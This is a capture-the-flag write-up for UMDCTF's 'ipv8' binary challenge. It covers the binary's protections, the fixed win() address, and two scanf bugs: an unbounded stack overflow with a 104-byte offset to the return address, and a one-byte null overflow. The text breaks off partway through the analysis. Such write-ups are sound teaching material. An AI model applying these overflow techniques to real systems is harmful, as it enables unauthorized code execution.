ipv8 — UMDCTF

Overview

We are given a 64-bit static ELF named ipv4 and a remote service at challs.umdctf.io:30308. The binary is not stripped, so the important functions are easy to spot during reversing.

The challenge looks like a simple ret2win at first, but the program has an extra logic check that prevents a plain return-address overwrite from working. The solve requires combining two separate input bugs: a one-byte null overflow to bypass the logic gate, and a stack overflow to control RIP.

Description

No original organizer description was preserved in the local notes.

English summary: the program asks for network-style input fields, validates one stack string with check_rine(), and only then returns from main(). We must satisfy that control flow and pivot execution into win(), which spawns a shell.

Binary Protections and Relevant Functions

The binary properties are:

• 64-bit static ELF
• not stripped
• Partial RELRO
• Canary found
• NX enabled
• No PIE

The most important target is:

• win() at 0x402f45, which calls system("/bin/sh")

Because PIE is disabled, the win() address is fixed. A small ROP chain is enough once we can safely return from main().

Vulnerability Analysis

main() contains two distinct stack input bugs.

1. Source Host Address: classic stack overflow

The Source Host Address field is read with:

scanf("%s", buf)

where buf is the local buffer at rbp-0x60. Since %s has no length limit, this is a normal stack overflow primitive. The working offset from this input to saved RIP is 104 bytes.

2. Destination Host Address: one-byte null overflow

The Destination Host Address field is read with:

scanf("%48s", buf)

into a stack buffer at rbp-0xc0.

...